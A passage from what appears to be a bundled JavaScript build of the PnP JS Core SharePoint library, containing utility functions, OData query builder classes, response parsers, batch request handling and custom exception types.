}; /** * Gets a random GUID value * * http://stackoverflow.com/questions/105034/create-guid-uuid-in-javascript */ /* tslint:disable no-bitwise */ Util.getGUID = function () { var d = new Date().getTime(); var guid = "xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx".replace(/[xy]/g, function (c) { var r = (d + Math.random() * 16) % 16 | 0; d = Math.floor(d / 16); return (c === "x" ? r : (r & 0x3 | 0x8)).toString(16); }); return guid; }; /* tslint:enable */ /** * Determines if a given value is a function * * @param candidateFunction The thing to test for being a function */ Util.isFunction = function (candidateFunction) { return typeof candidateFunction === "function"; }; /** * @returns whether the provided parameter is a JavaScript Array or not. */ Util.isArray = function (array) { if (Array.isArray) { return Array.isArray(array); } return array && typeof array.length === "number" && array.constructor === Array; }; /** * Determines if a string is null or empty or undefined * * @param s The string to test */ Util.stringIsNullOrEmpty = function (s) { return typeof s === "undefined" || s === null || s.length < 1; }; /** * Provides functionality to extend the given object by doing a shallow copy * * @param target The object to which properties will be copied * @param source The source object from which properties will be copied * @param noOverwrite If true existing properties on the target are not overwritten from the source * */ Util.extend = function (target, source, noOverwrite) { if (noOverwrite === void 0) { noOverwrite = false; } if (source === null || typeof source === "undefined") { return target; } // ensure we don't overwrite things we don't want overwritten var check = noOverwrite ? 
function (o, i) { return !(i in o); } : function () { return true; }; return Object.getOwnPropertyNames(source) .filter(function (v) { return check(target, v); }) .reduce(function (t, v) { t[v] = source[v]; return t; }, target); }; /** * Determines if a given url is absolute * * @param url The url to check to see if it is absolute */ Util.isUrlAbsolute = function (url) { return /^https?:\/\/|^\/\//i.test(url); }; /** * Ensures that a given url is absolute for the current web based on context * * @param candidateUrl The url to make absolute * */ Util.toAbsoluteUrl = function (candidateUrl) { return new Promise(function (resolve) { if (Util.isUrlAbsolute(candidateUrl)) { // if we are already absolute, then just return the url return resolve(candidateUrl); } if (pnplibconfig_1.RuntimeConfig.baseUrl !== null) { // base url specified either with baseUrl of spfxContext config property return resolve(Util.combinePaths(pnplibconfig_1.RuntimeConfig.baseUrl, candidateUrl)); } if (typeof global._spPageContextInfo !== "undefined") { // operating in classic pages if (global._spPageContextInfo.hasOwnProperty("webAbsoluteUrl")) { return resolve(Util.combinePaths(global._spPageContextInfo.webAbsoluteUrl, candidateUrl)); } else if (global._spPageContextInfo.hasOwnProperty("webServerRelativeUrl")) { return resolve(Util.combinePaths(global._spPageContextInfo.webServerRelativeUrl, candidateUrl)); } } // does window.location exist and have _layouts in it? if (typeof global.location !== "undefined") { var index = global.location.toString().toLowerCase().indexOf("/_layouts/"); if (index > 0) { // we are likely in the workbench in /_layouts/ return resolve(Util.combinePaths(global.location.toString().substr(0, index), candidateUrl)); } } return resolve(candidateUrl); }); }; return Util; }()); exports.Util = Util; /* WEBPACK VAR INJECTION */}.call(exports, __webpack_require__(32))) /***/ }), /* 1 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __extends = (this && this.__extends) || (function () { var extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; }; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __()); }; })(); Object.defineProperty(exports, "__esModule", { value: true }); var util_1 = __webpack_require__(0); var collections_1 = __webpack_require__(6); var odata_1 = __webpack_require__(2); var pnplibconfig_1 = __webpack_require__(4); var exceptions_1 = __webpack_require__(3); var logging_1 = __webpack_require__(5); var pipeline_1 = __webpack_require__(45); /** * Queryable Base Class * */ var Queryable = (function () { /** * Creates a new instance of the Queryable class * * @constructor * @param baseUrl A string or Queryable that should form the base part of the url * */ function Queryable(baseUrl, path) { this._query = new collections_1.Dictionary(); this._batch = null; if (typeof baseUrl === "string") { // we need to do some extra parsing to get the parent url correct if we are // being created from just a string. 
var urlStr = baseUrl; if (util_1.Util.isUrlAbsolute(urlStr) || urlStr.lastIndexOf("/") < 0) { this._parentUrl = urlStr; this._url = util_1.Util.combinePaths(urlStr, path); } else if (urlStr.lastIndexOf("/") > urlStr.lastIndexOf("(")) { // .../items(19)/fields var index = urlStr.lastIndexOf("/"); this._parentUrl = urlStr.slice(0, index); path = util_1.Util.combinePaths(urlStr.slice(index), path); this._url = util_1.Util.combinePaths(this._parentUrl, path); } else { // .../items(19) var index = urlStr.lastIndexOf("("); this._parentUrl = urlStr.slice(0, index); this._url = util_1.Util.combinePaths(urlStr, path); } } else { var q = baseUrl; this._parentUrl = q._url; var target = q._query.get("@target"); if (target !== null) { this._query.add("@target", target); } this._url = util_1.Util.combinePaths(this._parentUrl, path); } } /** * Directly concatonates the supplied string to the current url, not normalizing "/" chars * * @param pathPart The string to concatonate to the url */ Queryable.prototype.concat = function (pathPart) { this._url += pathPart; return this; }; /** * Appends the given string and normalizes "/" chars * * @param pathPart The string to append */ Queryable.prototype.append = function (pathPart) { this._url = util_1.Util.combinePaths(this._url, pathPart); }; /** * Blocks a batch call from occuring, MUST be cleared by calling the returned function */ Queryable.prototype.addBatchDependency = function () { if (this.hasBatch) { return this._batch.addDependency(); } return function () { return null; }; }; Object.defineProperty(Queryable.prototype, "hasBatch", { /** * Indicates if the current query has a batch associated * */ get: function () { return this._batch !== null; }, enumerable: true, configurable: true }); Object.defineProperty(Queryable.prototype, "batch", { /** * The batch currently associated with this query or null * */ get: function () { return this.hasBatch ? this._batch : null; }, enumerable: true, configurable: true }); Object.defineProperty(Queryable.prototype, "parentUrl", { /** * Gets the parent url used when creating this instance * */ get: function () { return this._parentUrl; }, enumerable: true, configurable: true }); Object.defineProperty(Queryable.prototype, "query", { /** * Provides access to the query builder for this url * */ get: function () { return this._query; }, enumerable: true, configurable: true }); /** * Creates a new instance of the supplied factory and extends this into that new instance * * @param factory constructor for the new queryable */ Queryable.prototype.as = function (factory) { var o = new factory(this._url, null); return util_1.Util.extend(o, this, true); }; /** * Adds this query to the supplied batch * * @example * ``` * * let b = pnp.sp.createBatch(); * pnp.sp.web.inBatch(b).get().then(...); * b.execute().then(...) 
* ``` */ Queryable.prototype.inBatch = function (batch) { if (this._batch !== null) { throw new exceptions_1.AlreadyInBatchException(); } this._batch = batch; return this; }; /** * Enables caching for this request * * @param options Defines the options used when caching this request */ Queryable.prototype.usingCaching = function (options) { if (!pnplibconfig_1.RuntimeConfig.globalCacheDisable) { this._useCaching = true; this._cachingOptions = options; } return this; }; /** * Gets the currentl url, made absolute based on the availability of the _spPageContextInfo object * */ Queryable.prototype.toUrl = function () { return this._url; }; /** * Gets the full url with query information * */ Queryable.prototype.toUrlAndQuery = function () { var aliasedParams = new collections_1.Dictionary(); var url = this.toUrl().replace(/'!(@.*?)::(.*?)'/ig, function (match, labelName, value) { logging_1.Logger.write("Rewriting aliased parameter from match " + match + " to label: " + labelName + " value: " + value, logging_1.LogLevel.Verbose); aliasedParams.add(labelName, "'" + value + "'"); return labelName; }); // inlude our explicitly set query string params aliasedParams.merge(this._query); if (aliasedParams.count() > 0) { url += "?" + aliasedParams.getKeys().map(function (key) { return key + "=" + aliasedParams.get(key); }).join("&"); } return url; }; /** * Gets a parent for this instance as specified * * @param factory The contructor for the class to create */ Queryable.prototype.getParent = function (factory, baseUrl, path, batch) { if (baseUrl === void 0) { baseUrl = this.parentUrl; } var parent = new factory(baseUrl, path); var target = this.query.get("@target"); if (target !== null) { parent.query.add("@target", target); } if (typeof batch !== "undefined") { parent = parent.inBatch(batch); } return parent; }; /** * Clones this queryable into a new queryable instance of T * @param factory Constructor used to create the new instance * @param additionalPath Any additional path to include in the clone * @param includeBatch If true this instance's batch will be added to the cloned instance */ Queryable.prototype.clone = function (factory, additionalPath, includeBatch) { if (includeBatch === void 0) { includeBatch = false; } var clone = new factory(this, additionalPath); var target = this.query.get("@target"); if (target !== null) { clone.query.add("@target", target); } if (includeBatch && this.hasBatch) { clone = clone.inBatch(this.batch); } return clone; }; /** * Executes the currently built request * * @param parser Allows you to specify a parser to handle the result * @param getOptions The options used for this request */ Queryable.prototype.get = function (parser, getOptions) { if (parser === void 0) { parser = new odata_1.ODataDefaultParser(); } if (getOptions === void 0) { getOptions = {}; } return this.toRequestContext("GET", getOptions, parser).then(function (context) { return pipeline_1.pipe(context); }); }; Queryable.prototype.getAs = function (parser, getOptions) { if (parser === void 0) { parser = new odata_1.ODataDefaultParser(); } if (getOptions === void 0) { getOptions = {}; } return this.toRequestContext("GET", getOptions, parser).then(function (context) { return pipeline_1.pipe(context); }); }; Queryable.prototype.post = function (postOptions, parser) { if (postOptions === void 0) { postOptions = {}; } if (parser === void 0) { parser = new odata_1.ODataDefaultParser(); } return this.toRequestContext("POST", postOptions, parser).then(function (context) { return pipeline_1.pipe(context); 
}); }; Queryable.prototype.postAs = function (postOptions, parser) { if (postOptions === void 0) { postOptions = {}; } if (parser === void 0) { parser = new odata_1.ODataDefaultParser(); } return this.toRequestContext("POST", postOptions, parser).then(function (context) { return pipeline_1.pipe(context); }); }; Queryable.prototype.patch = function (patchOptions, parser) { if (patchOptions === void 0) { patchOptions = {}; } if (parser === void 0) { parser = new odata_1.ODataDefaultParser(); } return this.toRequestContext("PATCH", patchOptions, parser).then(function (context) { return pipeline_1.pipe(context); }); }; Queryable.prototype.delete = function (deleteOptions, parser) { if (deleteOptions === void 0) { deleteOptions = {}; } if (parser === void 0) { parser = new odata_1.ODataDefaultParser(); } return this.toRequestContext("DELETE", deleteOptions, parser).then(function (context) { return pipeline_1.pipe(context); }); }; /** * Converts the current instance to a request context * * @param verb The request verb * @param options The set of supplied request options * @param parser The supplied ODataParser instance * @param pipeline Optional request processing pipeline */ Queryable.prototype.toRequestContext = function (verb, options, parser, pipeline) { var _this = this; if (options === void 0) { options = {}; } if (pipeline === void 0) { pipeline = pipeline_1.PipelineMethods.default; } var dependencyDispose = this.hasBatch ? this.addBatchDependency() : function () { return; }; return util_1.Util.toAbsoluteUrl(this.toUrlAndQuery()).then(function (url) { // build our request context var context = { batch: _this._batch, batchDependency: dependencyDispose, cachingOptions: _this._cachingOptions, isBatched: _this.hasBatch, isCached: _this._useCaching, options: options, parser: parser, pipeline: pipeline, requestAbsoluteUrl: url, requestId: util_1.Util.getGUID(), verb: verb, }; return context; }); }; return Queryable; }()); exports.Queryable = Queryable; /** * Represents a REST collection which can be filtered, paged, and selected * */ var QueryableCollection = (function (_super) { __extends(QueryableCollection, _super); function QueryableCollection() { return _super !== null && _super.apply(this, arguments) || this; } /** * Filters the returned collection (https://msdn.microsoft.com/en-us/library/office/fp142385.aspx#bk_supported) * * @param filter The string representing the filter query */ QueryableCollection.prototype.filter = function (filter) { this._query.add("$filter", filter); return this; }; /** * Choose which fields to return * * @param selects One or more fields to return */ QueryableCollection.prototype.select = function () { var selects = []; for (var _i = 0; _i < arguments.length; _i++) { selects[_i] = arguments[_i]; } if (selects.length > 0) { this._query.add("$select", selects.join(",")); } return this; }; /** * Expands fields such as lookups to get additional data * * @param expands The Fields for which to expand the values */ QueryableCollection.prototype.expand = function () { var expands = []; for (var _i = 0; _i < arguments.length; _i++) { expands[_i] = arguments[_i]; } if (expands.length > 0) { this._query.add("$expand", expands.join(",")); } return this; }; /** * Orders based on the supplied fields ascending * * @param orderby The name of the field to sort on * @param ascending If false DESC is appended, otherwise ASC (default) */ QueryableCollection.prototype.orderBy = function (orderBy, ascending) { if (ascending === void 0) { ascending = true; } var keys = 
this._query.getKeys(); var query = []; var asc = ascending ? " asc" : " desc"; for (var i = 0; i < keys.length; i++) { if (keys[i] === "$orderby") { query.push(this._query.get("$orderby")); break; } } query.push("" + orderBy + asc); this._query.add("$orderby", query.join(",")); return this; }; /** * Skips the specified number of items * * @param skip The number of items to skip */ QueryableCollection.prototype.skip = function (skip) { this._query.add("$skip", skip.toString()); return this; }; /** * Limits the query to only return the specified number of items * * @param top The query row limit */ QueryableCollection.prototype.top = function (top) { this._query.add("$top", top.toString()); return this; }; return QueryableCollection; }(Queryable)); exports.QueryableCollection = QueryableCollection; /** * Represents an instance that can be selected * */ var QueryableInstance = (function (_super) { __extends(QueryableInstance, _super); function QueryableInstance() { return _super !== null && _super.apply(this, arguments) || this; } /** * Choose which fields to return * * @param selects One or more fields to return */ QueryableInstance.prototype.select = function () { var selects = []; for (var _i = 0; _i < arguments.length; _i++) { selects[_i] = arguments[_i]; } if (selects.length > 0) { this._query.add("$select", selects.join(",")); } return this; }; /** * Expands fields such as lookups to get additional data * * @param expands The Fields for which to expand the values */ QueryableInstance.prototype.expand = function () { var expands = []; for (var _i = 0; _i < arguments.length; _i++) { expands[_i] = arguments[_i]; } if (expands.length > 0) { this._query.add("$expand", expands.join(",")); } return this; }; return QueryableInstance; }(Queryable)); exports.QueryableInstance = QueryableInstance; /***/ }), /* 2 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __extends = (this && this.__extends) || (function () { var extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; }; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ? 
Object.create(b) : (__.prototype = b.prototype, new __()); }; })(); Object.defineProperty(exports, "__esModule", { value: true }); var util_1 = __webpack_require__(0); var logging_1 = __webpack_require__(5); var httpclient_1 = __webpack_require__(15); var pnplibconfig_1 = __webpack_require__(4); var exceptions_1 = __webpack_require__(3); var exceptions_2 = __webpack_require__(3); function extractOdataId(candidate) { if (candidate.hasOwnProperty("odata.id")) { return candidate["odata.id"]; } else if (candidate.hasOwnProperty("__metadata") && candidate.__metadata.hasOwnProperty("id")) { return candidate.__metadata.id; } else { throw new exceptions_1.ODataIdException(candidate); } } exports.extractOdataId = extractOdataId; var ODataParserBase = (function () { function ODataParserBase() { } ODataParserBase.prototype.parse = function (r) { var _this = this; return new Promise(function (resolve, reject) { if (_this.handleError(r, reject)) { if ((r.headers.has("Content-Length") && parseFloat(r.headers.get("Content-Length")) === 0) || r.status === 204) { resolve({}); } else { r.json().then(function (json) { return resolve(_this.parseODataJSON(json)); }).catch(function (e) { return reject(e); }); } } }); }; ODataParserBase.prototype.handleError = function (r, reject) { if (!r.ok) { r.json().then(function (json) { // include the headers as they contain diagnostic information var data = { responseBody: json, responseHeaders: r.headers, }; reject(new exceptions_2.ProcessHttpClientResponseException(r.status, r.statusText, data)); }).catch(function (e) { // we failed to read the body - possibly it is empty. Let's report the original status that caused // the request to fail and log the error with parsing the body if anyone needs it for debugging logging_1.Logger.log({ data: e, level: logging_1.LogLevel.Warning, message: "There was an error parsing the error response body. 
See data for details.", }); // include the headers as they contain diagnostic information var data = { responseBody: "[[body not available]]", responseHeaders: r.headers, }; reject(new exceptions_2.ProcessHttpClientResponseException(r.status, r.statusText, data)); }); } return r.ok; }; ODataParserBase.prototype.parseODataJSON = function (json) { var result = json; if (json.hasOwnProperty("d")) { if (json.d.hasOwnProperty("results")) { result = json.d.results; } else { result = json.d; } } else if (json.hasOwnProperty("value")) { result = json.value; } return result; }; return ODataParserBase; }()); exports.ODataParserBase = ODataParserBase; var ODataDefaultParser = (function (_super) { __extends(ODataDefaultParser, _super); function ODataDefaultParser() { return _super !== null && _super.apply(this, arguments) || this; } return ODataDefaultParser; }(ODataParserBase)); exports.ODataDefaultParser = ODataDefaultParser; var ODataRawParserImpl = (function () { function ODataRawParserImpl() { } ODataRawParserImpl.prototype.parse = function (r) { return r.json(); }; return ODataRawParserImpl; }()); exports.ODataRawParserImpl = ODataRawParserImpl; var ODataValueParserImpl = (function (_super) { __extends(ODataValueParserImpl, _super); function ODataValueParserImpl() { return _super !== null && _super.apply(this, arguments) || this; } ODataValueParserImpl.prototype.parse = function (r) { return _super.prototype.parse.call(this, r).then(function (d) { return d; }); }; return ODataValueParserImpl; }(ODataParserBase)); var ODataEntityParserImpl = (function (_super) { __extends(ODataEntityParserImpl, _super); function ODataEntityParserImpl(factory) { var _this = _super.call(this) || this; _this.factory = factory; return _this; } ODataEntityParserImpl.prototype.parse = function (r) { var _this = this; return _super.prototype.parse.call(this, r).then(function (d) { var o = new _this.factory(getEntityUrl(d), null); return util_1.Util.extend(o, d); }); }; return ODataEntityParserImpl; }(ODataParserBase)); var ODataEntityArrayParserImpl = (function (_super) { __extends(ODataEntityArrayParserImpl, _super); function ODataEntityArrayParserImpl(factory) { var _this = _super.call(this) || this; _this.factory = factory; return _this; } ODataEntityArrayParserImpl.prototype.parse = function (r) { var _this = this; return _super.prototype.parse.call(this, r).then(function (d) { return d.map(function (v) { var o = new _this.factory(getEntityUrl(v), null); return util_1.Util.extend(o, v); }); }); }; return ODataEntityArrayParserImpl; }(ODataParserBase)); function getEntityUrl(entity) { if (entity.hasOwnProperty("odata.editLink")) { // we are dealign with minimal metadata (default) return util_1.Util.combinePaths("_api", entity["odata.editLink"]); } else if (entity.hasOwnProperty("__metadata")) { // we are dealing with verbose, which has an absolute uri return entity.__metadata.uri; } else { // we are likely dealing with nometadata, so don't error but we won't be able to // chain off these objects logging_1.Logger.write("No uri information found in ODataEntity parsing, chaining will fail for this object.", logging_1.LogLevel.Warning); return ""; } } exports.getEntityUrl = getEntityUrl; exports.ODataRaw = new ODataRawParserImpl(); function ODataValue() { return new ODataValueParserImpl(); } exports.ODataValue = ODataValue; function ODataEntity(factory) { return new ODataEntityParserImpl(factory); } exports.ODataEntity = ODataEntity; function ODataEntityArray(factory) { return new ODataEntityArrayParserImpl(factory); } 
exports.ODataEntityArray = ODataEntityArray; /** * Manages a batch of OData operations */ var ODataBatch = (function () { function ODataBatch(baseUrl, _batchId) { if (_batchId === void 0) { _batchId = util_1.Util.getGUID(); } this.baseUrl = baseUrl; this._batchId = _batchId; this._requests = []; this._dependencies = []; } Object.defineProperty(ODataBatch.prototype, "batchId", { get: function () { return this._batchId; }, enumerable: true, configurable: true }); /** * Adds a request to a batch (not designed for public use) * * @param url The full url of the request * @param method The http method GET, POST, etc * @param options Any options to include in the request * @param parser The parser that will hadle the results of the request */ ODataBatch.prototype.add = function (url, method, options, parser) { var info = { method: method.toUpperCase(), options: options, parser: parser, reject: null, resolve: null, url: url, }; var p = new Promise(function (resolve, reject) { info.resolve = resolve; info.reject = reject; }); this._requests.push(info); return p; }; /** * Adds a dependency insuring that some set of actions will occur before a batch is processed. * MUST be cleared using the returned resolve delegate to allow batches to run */ ODataBatch.prototype.addDependency = function () { var resolver; var promise = new Promise(function (resolve) { resolver = resolve; }); this._dependencies.push(promise); return resolver; }; /** * Execute the current batch and resolve the associated promises * * @returns A promise which will be resolved once all of the batch's child promises have resolved */ ODataBatch.prototype.execute = function () { var _this = this; // we need to check the dependencies twice due to how different engines handle things. // We can get a second set of promises added after the first set resolve return Promise.all(this._dependencies).then(function () { return Promise.all(_this._dependencies); }).then(function () { return _this.executeImpl(); }); }; ODataBatch.prototype.executeImpl = function () { var _this = this; logging_1.Logger.write("[" + this.batchId + "] (" + (new Date()).getTime() + ") Executing batch with " + this._requests.length + " requests.", logging_1.LogLevel.Info); // if we don't have any requests, don't bother sending anything // this could be due to caching further upstream, or just an empty batch if (this._requests.length < 1) { logging_1.Logger.write("Resolving empty batch.", logging_1.LogLevel.Info); return Promise.resolve(); } // creating the client here allows the url to be populated for nodejs client as well as potentially // any other hacks needed for other types of clients. 
Essentially allows the absoluteRequestUrl // below to be correct var client = new httpclient_1.HttpClient(); // due to timing we need to get the absolute url here so we can use it for all the individual requests // and for sending the entire batch return util_1.Util.toAbsoluteUrl(this.baseUrl).then(function (absoluteRequestUrl) { // build all the requests, send them, pipe results in order to parsers var batchBody = []; var currentChangeSetId = ""; for (var i = 0; i < _this._requests.length; i++) { var reqInfo = _this._requests[i]; if (reqInfo.method === "GET") { if (currentChangeSetId.length > 0) { // end an existing change set batchBody.push("--changeset_" + currentChangeSetId + "--\n\n"); currentChangeSetId = ""; } batchBody.push("--batch_" + _this._batchId + "\n"); } else { if (currentChangeSetId.length < 1) { // start new change set currentChangeSetId = util_1.Util.getGUID(); batchBody.push("--batch_" + _this._batchId + "\n"); batchBody.push("Content-Type: multipart/mixed; boundary=\"changeset_" + currentChangeSetId + "\"\n\n"); } batchBody.push("--changeset_" + currentChangeSetId + "\n"); } // common batch part prefix batchBody.push("Content-Type: application/http\n"); batchBody.push("Content-Transfer-Encoding: binary\n\n"); var headers = { "Accept": "application/json;", }; // this is the url of the individual request within the batch var url = util_1.Util.isUrlAbsolute(reqInfo.url) ? reqInfo.url : util_1.Util.combinePaths(absoluteRequestUrl, reqInfo.url); logging_1.Logger.write("[" + _this.batchId + "] (" + (new Date()).getTime() + ") Adding request " + reqInfo.method + " " + url + " to batch.", logging_1.LogLevel.Verbose); if (reqInfo.method !== "GET") { var method = reqInfo.method; if (reqInfo.hasOwnProperty("options") && reqInfo.options.hasOwnProperty("headers") && typeof reqInfo.options.headers["X-HTTP-Method"] !== "undefined") { method = reqInfo.options.headers["X-HTTP-Method"]; delete reqInfo.options.headers["X-HTTP-Method"]; } batchBody.push(method + " " + url + " HTTP/1.1\n"); headers = util_1.Util.extend(headers, { "Content-Type": "application/json;odata=verbose;charset=utf-8" }); } else { batchBody.push(reqInfo.method + " " + url + " HTTP/1.1\n"); } if (typeof pnplibconfig_1.RuntimeConfig.headers !== "undefined") { headers = util_1.Util.extend(headers, pnplibconfig_1.RuntimeConfig.headers); } if (reqInfo.options && reqInfo.options.headers) { headers = util_1.Util.extend(headers, reqInfo.options.headers); } for (var name_1 in headers) { if (headers.hasOwnProperty(name_1)) { batchBody.push(name_1 + ": " + headers[name_1] + "\n"); } } batchBody.push("\n"); if (reqInfo.options.body) { batchBody.push(reqInfo.options.body + "\n\n"); } } if (currentChangeSetId.length > 0) { // Close the changeset batchBody.push("--changeset_" + currentChangeSetId + "--\n\n"); currentChangeSetId = ""; } batchBody.push("--batch_" + _this._batchId + "--\n"); var batchHeaders = { "Content-Type": "multipart/mixed; boundary=batch_" + _this._batchId, }; var batchOptions = { "body": batchBody.join(""), "headers": batchHeaders, }; logging_1.Logger.write("[" + _this.batchId + "] (" + (new Date()).getTime() + ") Sending batch request.", logging_1.LogLevel.Info); return client.post(util_1.Util.combinePaths(absoluteRequestUrl, "/_api/$batch"), batchOptions) .then(function (r) { return r.text(); }) .then(_this._parseResponse) .then(function (responses) { if (responses.length !== _this._requests.length) { throw new exceptions_1.BatchParseException("Could not properly parse responses to match requests in 
batch."); } logging_1.Logger.write("[" + _this.batchId + "] (" + (new Date()).getTime() + ") Resolving batched requests.", logging_1.LogLevel.Info); return responses.reduce(function (chain, response, index) { var request = _this._requests[index]; logging_1.Logger.write("[" + _this.batchId + "] (" + (new Date()).getTime() + ") Resolving batched request " + request.method + " " + request.url + ".", logging_1.LogLevel.Verbose); return chain.then(function (_) { return request.parser.parse(response).then(request.resolve).catch(request.reject); }); }, Promise.resolve()); }); }); }; /** * Parses the response from a batch request into an array of Response instances * * @param body Text body of the response from the batch request */ ODataBatch.prototype._parseResponse = function (body) { return new Promise(function (resolve, reject) { var responses = []; var header = "--batchresponse_"; // Ex. "HTTP/1.1 500 Internal Server Error" var statusRegExp = new RegExp("^HTTP/[0-9.]+ +([0-9]+) +(.*)", "i"); var lines = body.split("\n"); var state = "batch"; var status; var statusText; for (var i = 0; i < lines.length; ++i) { var line = lines[i]; switch (state) { case "batch": if (line.substr(0, header.length) === header) { state = "batchHeaders"; } else { if (line.trim() !== "") { throw new exceptions_1.BatchParseException("Invalid response, line " + i); } } break; case "batchHeaders": if (line.trim() === "") { state = "status"; } break; case "status": var parts = statusRegExp.exec(line); if (parts.length !== 3) { throw new exceptions_1.BatchParseException("Invalid status, line " + i); } status = parseInt(parts[1], 10); statusText = parts[2]; state = "statusHeaders"; break; case "statusHeaders": if (line.trim() === "") { state = "body"; } break; case "body": responses.push((status === 204) ? new Response() : new Response(line, { status: status, statusText: statusText })); state = "batch"; break; } } if (state !== "status") { reject(new exceptions_1.BatchParseException("Unexpected end of input")); } resolve(responses); }); }; return ODataBatch; }()); exports.ODataBatch = ODataBatch; var TextFileParser = (function () { function TextFileParser() { } TextFileParser.prototype.parse = function (r) { return r.text(); }; return TextFileParser; }()); exports.TextFileParser = TextFileParser; var BlobFileParser = (function () { function BlobFileParser() { } BlobFileParser.prototype.parse = function (r) { return r.blob(); }; return BlobFileParser; }()); exports.BlobFileParser = BlobFileParser; var JSONFileParser = (function () { function JSONFileParser() { } JSONFileParser.prototype.parse = function (r) { return r.json(); }; return JSONFileParser; }()); exports.JSONFileParser = JSONFileParser; var BufferFileParser = (function () { function BufferFileParser() { } BufferFileParser.prototype.parse = function (r) { if (util_1.Util.isFunction(r.arrayBuffer)) { return r.arrayBuffer(); } return r.buffer(); }; return BufferFileParser; }()); exports.BufferFileParser = BufferFileParser; /***/ }), /* 3 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __extends = (this && this.__extends) || (function () { var extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; }; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ? 
Object.create(b) : (__.prototype = b.prototype, new __());
    };
})();
Object.defineProperty(exports, "__esModule", { value: true });
var logging_1 = __webpack_require__(5);
function defaultLog(error) {
    logging_1.Logger.log({ data: {}, level: logging_1.LogLevel.Error, message: "[" + error.name + "]::" + error.message });
}
/**
 * Represents an exception with an HttpClient request
 *
 */
var ProcessHttpClientResponseException = (function (_super) {
    __extends(ProcessHttpClientResponseException, _super);
    function ProcessHttpClientResponseException(status, statusText, data) {
        var _this = _super.call(this, "Error making HttpClient request in queryable: [" + status + "] " + statusText) || this;
        _this.status = status;
        _this.statusText = statusText;
        _this.data = data;
        _this.name = "ProcessHttpClientResponseException";
        logging_1.Logger.log({ data: _this.data, level: logging_1.LogLevel.Error, message: _this.message });
        return _this;
    }
    return ProcessHttpClientResponseException;
}(Error));
exports.ProcessHttpClientResponseException = ProcessHttpClientResponseException;
var NoCacheAvailableException = (function (_super) {
    __extends(NoCacheAvailableException, _super);
    function NoCacheAvailableException(msg) {
        if (msg === void 0) { msg = "Cannot create a caching configuration provider since cache is not available."; }
        var _this = _super.call(this, msg) || this;
        _this.name = "NoCacheAvailableException";
        defaultLog(_this);
        return _this;
    }
    return NoCacheAvailableException;
}(Error));
exports.NoCacheAvailableException = NoCacheAvailableException;
var APIUrlException = (function (_super) {
    __extends(APIUrlException, _super);
    function APIUrlException(msg) {
        if (msg === void 0) { msg = "Unable to determine API url."; }
        var _this = _super.call(this, msg) || this;
        _this.name = "APIUrlException";
        defaultLog(_this);
        return _this;
    }
    return APIUrlException;
}(Error));
exports.APIUrlException = APIUrlException;
var AuthUrlException = (function (_super) {
    __extends(AuthUrlException, _super);
    function AuthUrlException(data, msg) {
        if (msg === void 0) { msg = "Auth URL Endpoint could not be determined from data. Data logged."; }
        var _this = _super.call(this, msg) || this;
        _this.name = "AuthUrlException";
        logging_1.Logger.log({ data: data, level: logging_1.LogLevel.Error, message: _this.message });
        return _this;
    }
    return AuthUrlException;
}(Error));
exports.AuthUrlException = AuthUrlException;
var NodeFetchClientUnsupportedException = (function (_super) {
    __extends(NodeFetchClientUnsupportedException, _super);
    function NodeFetchClientUnsupportedException(msg) {
        if (msg === void 0) { msg = "Using NodeFetchClient in the browser is not supported."; }
        var _this = _super.call(this, msg) || this;
        _this.name = "NodeFetchClientUnsupportedException";
        defaultLog(_this);
        return _this;
    }
    return NodeFetchClientUnsupportedException;
}(Error));
exports.NodeFetchClientUnsupportedException = NodeFetchClientUnsupportedException;
var SPRequestExecutorUndefinedException = (function (_super) {
    __extends(SPRequestExecutorUndefinedException, _super);
    function SPRequestExecutorUndefinedException() {
        var _this = this;
        var msg = [
            "SP.RequestExecutor is undefined.",
            "Load the SP.RequestExecutor.js library (/_layouts/15/SP.RequestExecutor.js) before loading the PnP JS Core library.",
        ].join(" ");
        _this = _super.call(this, msg) || this;
        _this.name = "SPRequestExecutorUndefinedException";
        defaultLog(_this);
        return _this;
    }
    return SPRequestExecutorUndefinedException;
}(Error));
exports.SPRequestExecutorUndefinedException = SPRequestExecutorUndefinedException;
var MaxCommentLengthException = (function (_super) {
    __extends(MaxCommentLengthException, _super);
    function MaxCommentLengthException(msg) {
        if (msg === void 0) { msg = "The maximum comment length is 1023 characters."; }
        var _this = _super.call(this, msg) || this;
        _this.name = "MaxCommentLengthException";
        defaultLog(_this);
        return _this;
    }
    return MaxCommentLengthException;
}(Error));
exports.MaxCommentLengthException = MaxCommentLengthException;
var NotSupportedInBatchException = (function (_super) {
    __extends(NotSupportedInBatchException, _super);
    function NotSupportedInBatchException(operation) {
        if (operation === void 0) { operation = "This operation"; }
        var _this = _super.call(this, operation + " is not supported as part of a batch.") || this;
        _this.name = "NotSupportedInBatchException";
        defaultLog(_this);
        return _this;
    }
    return NotSupportedInBatchException;
}(Error));
exports.NotSupportedInBatchException = NotSupportedInBatchException;
var ODataIdException = (function (_super) {
    __extends(ODataIdException, _super);
    function ODataIdException(data, msg) {
        if (msg === void 0) { msg = "Could not extract odata id in object, you may be using nometadata. Object data logged to logger."; }
        var _this = _super.call(this, msg) || this;
        _this.name = "ODataIdException";
        logging_1.Logger.log({ data: data, level: logging_1.LogLevel.Error, message: _this.message });
        return _this;
    }
    return ODataIdException;
}(Error));
exports.ODataIdException = ODataIdException;
var BatchParseException = (function (_super) {
    __extends(BatchParseException, _super);
    function BatchParseException(msg) {
        var _this = _super.call(this, msg) || this;
        _this.name = "BatchParseException";
        defaultLog(_this);
        return _this;
    }
    return BatchParseException;
}(Error));
exports.BatchParseException = BatchParseException;
